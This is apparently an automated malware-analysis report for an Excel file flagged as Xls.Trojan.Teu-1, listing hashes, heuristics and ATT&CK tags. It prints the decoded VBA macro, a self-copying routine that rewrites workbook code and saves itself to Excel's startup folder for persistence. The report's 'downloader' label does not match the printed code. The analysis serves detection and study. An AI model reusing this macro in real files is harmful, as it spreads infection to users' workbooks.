Xls.Trojan.Teu-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 9832dca123176576…

MALICIOUS

Office (OLE)

17.0 KB Created: 2000-01-17 23:30:21 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: b592e68581f9461dc324b92b6104def5 SHA-1: d5c248483c4e3788eac4295d3863d4287f2c2c26 SHA-256: 9832dca12317657694da3212f19ba32530c7f8a729568a24cbd5e4901515603e
80 Risk Score

Malware Insights

Xls.Trojan.Teu-1 · confidence 85%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel file contains VBA macros that are detected as malicious by ClamAV. The macro code attempts to save the workbook to a specific path, potentially to establish persistence. The heuristic firings and the nature of the macro code suggest a trojan downloader.

Heuristics 2

  • ClamAV: Xls.Trojan.Teu-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Teu-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1750 bytes
SHA-256: f18237dd0803b88758ff3f8293481eca7988a0c70bf0fdf9ee3e1c44bdf5e75a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Sub WorkBook_Deactivate()
'klteu17
Set teu20217 = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set be1720217 = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If teu20217.Lines(2, 1) <> "'" Then
teu20217.deletelines 1, teu20217.countoflines
teu20217.insertlines 1, be1720217.Lines(1, Var.countoflines)
End If
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
End If
End Sub